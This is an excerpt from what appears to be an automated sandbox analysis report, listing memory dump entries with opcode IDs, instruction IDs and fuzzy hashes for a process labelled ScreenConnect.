                                                                                              • Opcode Fuzzy Hash: f7376b68a4143486680b320d906f4a20ed0fc68737cdb0a6e36b8d547f2f1526
                                                                                              • Instruction Fuzzy Hash: 8F810472B0FB8B4FEBAB9BA8547117837A1EF55350F8A00B9D48DC71E7DD18A9058341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8d4e4404b8a8f6fa0f6dfe0315bccaad82e03206eb0d1b615c3cbc4a3a22bcea
                                                                                              • Instruction ID: f8b012865c584084ac2debc91ba6488f7b2de5b079c14e01735c5f25c7f0657c
                                                                                              • Opcode Fuzzy Hash: 8d4e4404b8a8f6fa0f6dfe0315bccaad82e03206eb0d1b615c3cbc4a3a22bcea
                                                                                              • Instruction Fuzzy Hash: 68819130718E4E8FDF98EF18C4A0AA973E2FF99304B1445A9D41EC7296DE35E852CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5451534c28fc91ba29158b8cd7e6504eccd2e0182614441381c2faad0f74cf2f
                                                                                              • Instruction ID: 2584ad64f4fd6dc016c408e0756dbe617a26b98cfe796af0411cfb55e96b3bb1
                                                                                              • Opcode Fuzzy Hash: 5451534c28fc91ba29158b8cd7e6504eccd2e0182614441381c2faad0f74cf2f
                                                                                              • Instruction Fuzzy Hash: 1D817F7160DE4E8FDB98DF2888756A93792FF59304B1501A9E46DC72E2DF35E912CB00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5002dd8ba4806dec2a39ef477568fa47eb5653657e7d0622fd1a9791caa6ef23
                                                                                              • Instruction ID: d8a5dde269c806b00ae239ca05777d79e9f62995bf239270c310227c3a49208c
                                                                                              • Opcode Fuzzy Hash: 5002dd8ba4806dec2a39ef477568fa47eb5653657e7d0622fd1a9791caa6ef23
                                                                                              • Instruction Fuzzy Hash: 5761FB3290F7AA6FE762AB7C98759E57BB0EF06214B4901F7C08CCB0A3DD1979458341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 61b5d4543aab3dfcaf1ed90bd3445c61dbb67896f0326cafb85eec7f685ece70
                                                                                              • Instruction ID: 1800ab3ce2eea56df2e44278c99ad6c58ec5855fbc3565ea520350ee9972f780
                                                                                              • Opcode Fuzzy Hash: 61b5d4543aab3dfcaf1ed90bd3445c61dbb67896f0326cafb85eec7f685ece70
                                                                                              • Instruction Fuzzy Hash: 29511431609E4E4FDBA8EF5CC4A4A6677E1EFA8340B1541BAD40DC71A6DE39ED02C781
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: edf403522b2df0349c32aacf4bf84ca57115b9e2714d8d3ae3765b2338e5dcb9
                                                                                              • Instruction ID: ac1a5f43706b815b83d1cce1da58184ab315b81afa6b099dbe344958ff11eff7
                                                                                              • Opcode Fuzzy Hash: edf403522b2df0349c32aacf4bf84ca57115b9e2714d8d3ae3765b2338e5dcb9
                                                                                              • Instruction Fuzzy Hash: D8517430719A4E8FDFD8DF68C4A4A6937A1FF69304B5501ADD419CB2E6CB35E942CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8c9ef704491945828f64425e05990467a2ba4964894ede7dffd9886e7ad82ba8
                                                                                              • Instruction ID: caafa1609dd78e9edaa584a61914ed87b36e60f997026bd1b770a1167e17fbf4
                                                                                              • Opcode Fuzzy Hash: 8c9ef704491945828f64425e05990467a2ba4964894ede7dffd9886e7ad82ba8
                                                                                              • Instruction Fuzzy Hash: FD512331B19A4A8FDBA8EB6DC8A5AA537E2EF5430074601B9D44EC71A7CE29FC41C740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 609043f126160d51c46b8a1fb86ade8185f282de425c7b773f601850366114b8
                                                                                              • Instruction ID: ecbd18bea3cc55e482d55fa42ba98d8c7ffcc546d4ac55bb3d9413afd48d87e7
                                                                                              • Opcode Fuzzy Hash: 609043f126160d51c46b8a1fb86ade8185f282de425c7b773f601850366114b8
                                                                                              • Instruction Fuzzy Hash: F8513A22F0994E8FEBA4EB6C94B59BA37D2EF9871470502B7E45DC31ABDE14AD418340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c997c45a2f5b41f58dccff56d08edf2bff08cc5b781658882921f35f01486cbf
                                                                                              • Instruction ID: 32404cd7d15ae24902465b81e35235195a48a45388b1fdde4892c3bb1969154f
                                                                                              • Opcode Fuzzy Hash: c997c45a2f5b41f58dccff56d08edf2bff08cc5b781658882921f35f01486cbf
                                                                                              • Instruction Fuzzy Hash: D851C37270DA494FEBD9DF688464AA177E2FF64310F4500A9D45DC71A7DE26F902CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 462ec630993395e76ded173f921579d2d2329f4a38c5f7a00d480a064b4222f3
                                                                                              • Instruction ID: 39bf4e02f2a774d234d4111ae86e2a3fb5724cb9b84b8ca667106d0dc25c34bd
                                                                                              • Opcode Fuzzy Hash: 462ec630993395e76ded173f921579d2d2329f4a38c5f7a00d480a064b4222f3
                                                                                              • Instruction Fuzzy Hash: 8D411832F0AA1D8FEFA4DB9CA4956BA73E1FF5CB51B01017AD40DC7265DE25AC028780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86c449ff66e562a27f37175393c0c3d392b537ecdffe7aed97a54884d2e5d1ae
                                                                                              • Instruction ID: 723f24dd412961d04434a622018bfef7b7aad03f047b65436d1850ad45b9e7a9
                                                                                              • Opcode Fuzzy Hash: 86c449ff66e562a27f37175393c0c3d392b537ecdffe7aed97a54884d2e5d1ae
                                                                                              • Instruction Fuzzy Hash: 0E410632B2DD4A4BEB68FA5C94619B873E1EFA4350B1401BED45EC71DBDD28B9028381
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4cfdfd735c9c2ea1396cd134d3cb6efd89a35b6fb15a06c078550ee1b77e63e4
                                                                                              • Instruction ID: 0a15b3d9f521ff9fca684374b083e0471eeecba312756ffc47a5a9dec2ab4a55
                                                                                              • Opcode Fuzzy Hash: 4cfdfd735c9c2ea1396cd134d3cb6efd89a35b6fb15a06c078550ee1b77e63e4
                                                                                              • Instruction Fuzzy Hash: A7414721B0EE8E4FE7A5EB6888755B93BA1EF45200B4900FAD45DCB0E7DE286906C341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 91af9fd86d84c0769dcacb096c6ea8d90b9ec25bdd4f7ed6f949b3514345cc55
                                                                                              • Instruction ID: ccc3776e3f42bd65c59aabddac801fa076b66ca43fc5593881e849ad22d2b3b4
                                                                                              • Opcode Fuzzy Hash: 91af9fd86d84c0769dcacb096c6ea8d90b9ec25bdd4f7ed6f949b3514345cc55
                                                                                              • Instruction Fuzzy Hash: 34516D70A19E4E8FDF99DF188464ABA37A2FF99304B1501A9D45DC72E6CB39E812C700
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bce25db3438e68d6971ddcc207c0d0c5962d8d0413fcec2c22c6dc559fd16987
                                                                                              • Instruction ID: 46804677f53403c07fced4b6ae1afcd7958a1197654425d189c5cf6c26f56474
                                                                                              • Opcode Fuzzy Hash: bce25db3438e68d6971ddcc207c0d0c5962d8d0413fcec2c22c6dc559fd16987
                                                                                              • Instruction Fuzzy Hash: 70414933B0EE4D8BEBA6EBA89C654E977E1FF94384B450179D44DC31B3DE25A9028740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9dfd0f47363006ef163583bf4d6ed7459119b7d9a375f1ff5231d64fd3fd307d
                                                                                              • Instruction ID: 61881c10c6bb10546d35fba03be58adba8b2a167e0995611dd638337aaeab17b
                                                                                              • Opcode Fuzzy Hash: 9dfd0f47363006ef163583bf4d6ed7459119b7d9a375f1ff5231d64fd3fd307d
                                                                                              • Instruction Fuzzy Hash: 24414531B0EE8E4BFBAAABB844655B577E1EF55340B5400BAD849C31E3EE15AA458380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 35ff2823095ef361ee98adda5ffe2fa1d5397437ed46e436628921231409b017
                                                                                              • Instruction ID: 42481090349e64e7bd0e6f59783f5c2f88142d963685ab6597151dd8796d648d
                                                                                              • Opcode Fuzzy Hash: 35ff2823095ef361ee98adda5ffe2fa1d5397437ed46e436628921231409b017
                                                                                              • Instruction Fuzzy Hash: 4F415631B0F6CDAFEB619BAA58745B57BE0EF53716B0501BAD09DC71A3ED086902C702
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 06fb3da5df6a812977884b7a533d2e5e3483a04b4fa36ace5f8f711fb06d52c8
                                                                                              • Instruction ID: 62a541ac882257548eea2ab8b8f9a0181689590e819bb86be508e0db3675d0b9
                                                                                              • Opcode Fuzzy Hash: 06fb3da5df6a812977884b7a533d2e5e3483a04b4fa36ace5f8f711fb06d52c8
                                                                                              • Instruction Fuzzy Hash: 1631C022A4F7C94FE7A797B94C294603FB0EF5366074E01EBC498CB1A7D958684A8352
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86cd2b7fa62e1123187a471b93cb3f1350bea98934fd7ee7ea0c5e7c6a1d9c4b
                                                                                              • Instruction ID: f529f91e303b8e0546b16dfee249d15030e4fdfe3c0001c833fc6130e08f991c
                                                                                              • Opcode Fuzzy Hash: 86cd2b7fa62e1123187a471b93cb3f1350bea98934fd7ee7ea0c5e7c6a1d9c4b
                                                                                              • Instruction Fuzzy Hash: D631D892A1FACA4FE7B7677C88295543FB0EF5255075A85FFC088CB0E3D9086C068341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0ae0946bd3a32ba6cc8788a19f30f58217d7e765dabc1e383ce2d04f9287da50
                                                                                              • Instruction ID: f83e537925273ff001360294aba8829f66086695178f1f4521a0bba9c426ed81
                                                                                              • Opcode Fuzzy Hash: 0ae0946bd3a32ba6cc8788a19f30f58217d7e765dabc1e383ce2d04f9287da50
                                                                                              • Instruction Fuzzy Hash: C0318012B0E99B1FE765B66C74758E97790DF81324B0A03F7D49CCA0EBDD189A428381
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 84b371d14842d7d1d46b7e65a465666a9236e43cba7301c0684f63cff73afa12
                                                                                              • Instruction ID: d9084928848eb6f3b064c72aacab0ae46dc16de9beda386a24f98ff571e0497f
                                                                                              • Opcode Fuzzy Hash: 84b371d14842d7d1d46b7e65a465666a9236e43cba7301c0684f63cff73afa12
                                                                                              • Instruction Fuzzy Hash: ED31A230719A4E8FDBA8EB69C4A5A6577E1FF6430174100B9D45EC72A6DE28FD41C740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3e7529e1ae1ae7bcc16386256648bd0ceda1ded9cb5397d0527a8ee33bfd50a5
                                                                                              • Instruction ID: f07935261beb35e5f229d7f463518dda94de010ab1677f131a159e4a1969e52f
                                                                                              • Opcode Fuzzy Hash: 3e7529e1ae1ae7bcc16386256648bd0ceda1ded9cb5397d0527a8ee33bfd50a5
                                                                                              • Instruction Fuzzy Hash: 3B21361170EE8A4FDB5AA7784C749A53BE1EF9620074A01FBE448CB1BAED18AD458341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eee5802bf6b492a78c3c24cd8c4c26a488f35961b04e6124896224bfb519162e
                                                                                              • Instruction ID: 089ba7e2e92491940c35b2b129d2925263f13350e89b160a954a5462efbae8c8
                                                                                              • Opcode Fuzzy Hash: eee5802bf6b492a78c3c24cd8c4c26a488f35961b04e6124896224bfb519162e
                                                                                              • Instruction Fuzzy Hash: 03210031E0EB8E9FEB55DBA484A46EC7BA0EF45300F5504FAD40DD70A2CE782A49C311
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f782b8a317a04e49b62eaefd2e2d3d87a3416ec478ba1849c186cc8ead1cbd7
                                                                                              • Instruction ID: 531929072b6c80718949491fe18b331f7a5a942785031ff8a58eb8a62ff3bd45
                                                                                              • Opcode Fuzzy Hash: 9f782b8a317a04e49b62eaefd2e2d3d87a3416ec478ba1849c186cc8ead1cbd7
                                                                                              • Instruction Fuzzy Hash: B531A23180E78A9FD712EFB8D4A1CD5BF70EF0235471906E6D088CB0A3DB24A558C751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b196c699e6f34fba82f10326fb788cfb9fdf66b2f22c282449b6dd4b65b978f
                                                                                              • Instruction ID: 3950a2d32afc2570156ef3841000f1297a5116527b42a05519875bade9dcd2a2
                                                                                              • Opcode Fuzzy Hash: 9b196c699e6f34fba82f10326fb788cfb9fdf66b2f22c282449b6dd4b65b978f
                                                                                              • Instruction Fuzzy Hash: A121F831B19E4F4BDF589B6C9469AF973D1FF59344700017AD40EC32AADD39E9518780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8593972f8186be71ac14c2a0773a6756a48c17fca3e9e5b8272a45781b479061
                                                                                              • Instruction ID: bc0eeb1054428d1d7cd8264317139c71c5aeb1a39d05a79ecc1f71630216781a
                                                                                              • Opcode Fuzzy Hash: 8593972f8186be71ac14c2a0773a6756a48c17fca3e9e5b8272a45781b479061
                                                                                              • Instruction Fuzzy Hash: C521C42290E78A9FD752AFB8E471CD57F70EF02358B1A06E7D089CB0A7DA146648C751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4b6a26133f8593c08a82b12c29288dfbf1640d192d12bcf94241e26d2542fcfa
                                                                                              • Instruction ID: ac93596171a72b072f52593d7523f0f56d3b573dd864c74926b790d033a79df3
                                                                                              • Opcode Fuzzy Hash: 4b6a26133f8593c08a82b12c29288dfbf1640d192d12bcf94241e26d2542fcfa
                                                                                              • Instruction Fuzzy Hash: 93119C31F19A4A0FD754EB6898658F277D0EF9931030506F7D41CC31A6CC2CA9428391
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4be77c07766cbdc689597cfbff2e5343d520117f6fb616ca1698056ca6f431a
                                                                                              • Instruction ID: ad073359a7483be2b57e04013df00b9c5eb87de21d47aaa4439fbff195d13435
                                                                                              • Opcode Fuzzy Hash: a4be77c07766cbdc689597cfbff2e5343d520117f6fb616ca1698056ca6f431a
                                                                                              • Instruction Fuzzy Hash: 1911E733B1ED0D4AEBE697A86C342FD76A1FF44384F8504BAE45DD31B3DE15A9008645
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f509ff7014a5820264f030ef2591524088f2ed1bb51408aa2ccdfbf6865ea4dc
                                                                                              • Instruction ID: ad1e543e3b162335de5994c17d82b805cbdf3438e9ce172d2faacdf134e4a06d
                                                                                              • Opcode Fuzzy Hash: f509ff7014a5820264f030ef2591524088f2ed1bb51408aa2ccdfbf6865ea4dc
                                                                                              • Instruction Fuzzy Hash: F011B7B6E0EB4C4BDFA6CFA468751A87FB1FF55300F45009AE498D31B3DA25A501CB01
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 51efc632b91f9d9117d8e394443b2d3a25238bebc99a358349408a61741bbbe9
                                                                                              • Instruction ID: e755ba4e150748a19069c42927a161b41254ba03105b4c0ae8b85ed24a204bc9
                                                                                              • Opcode Fuzzy Hash: 51efc632b91f9d9117d8e394443b2d3a25238bebc99a358349408a61741bbbe9
                                                                                              • Instruction Fuzzy Hash: 3D01F922B0ED4E1BDAD8E56D74655A8B3C2EFD822171507B7E41CC32A9ED15DD828780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f9f60cdb241c0326a4a0deaaa1c38a34bed725c75001afa1cc94fcc6dbb22875
                                                                                              • Instruction ID: e3647ef7b6a8012ff5d942e87dcd9de567235a86ed7a99b1636598e097a1b041
                                                                                              • Opcode Fuzzy Hash: f9f60cdb241c0326a4a0deaaa1c38a34bed725c75001afa1cc94fcc6dbb22875
                                                                                              • Instruction Fuzzy Hash: A5118271909A8D8FDF45DF6CC4149ED7BF0FF68315B0502AAD449D7266CB34A944CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e6113a27253123da86aa44e8ae14ec8846293d9b5aa92358900916ce7ef327c6
                                                                                              • Instruction ID: 61fa25aa72d74dc04b6af022ded772ad1a9467e318f3d93529949349f78f27fb
                                                                                              • Opcode Fuzzy Hash: e6113a27253123da86aa44e8ae14ec8846293d9b5aa92358900916ce7ef327c6
                                                                                              • Instruction Fuzzy Hash: 5701FC21B1CE4A0FDB88EB6C54A99BA77D0EF9822071001F7D81CC71EBDC29D9418380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 29176d31256cfbcf9d87e61f140d5d6d53c3ac02b25d4a880a48b80e2964983b
                                                                                              • Instruction ID: f5a697ffb33b37ad8b188d37d4be9a8a49537e000e45d8881715509096a4518d
                                                                                              • Opcode Fuzzy Hash: 29176d31256cfbcf9d87e61f140d5d6d53c3ac02b25d4a880a48b80e2964983b
                                                                                              • Instruction Fuzzy Hash: 0111E830B1891D8FDF98EB6CD464EB9B3E1FF98301B51007AD41ED32A1DE25A8008B40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ca58c5d1a1ec9b3157ac26788a404c004d72f4641c52e5c943f9cbbe52907a32
                                                                                              • Instruction ID: 36f3d7d65e07e79461fca994adb8813f5d39747591d6000ba44989335910d72b
                                                                                              • Opcode Fuzzy Hash: ca58c5d1a1ec9b3157ac26788a404c004d72f4641c52e5c943f9cbbe52907a32
                                                                                              • Instruction Fuzzy Hash: EA11C615F0EA9B0BF7BA536884B13756AF1DF45240F5A80BEC449C61E7DD6CAD82C301
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
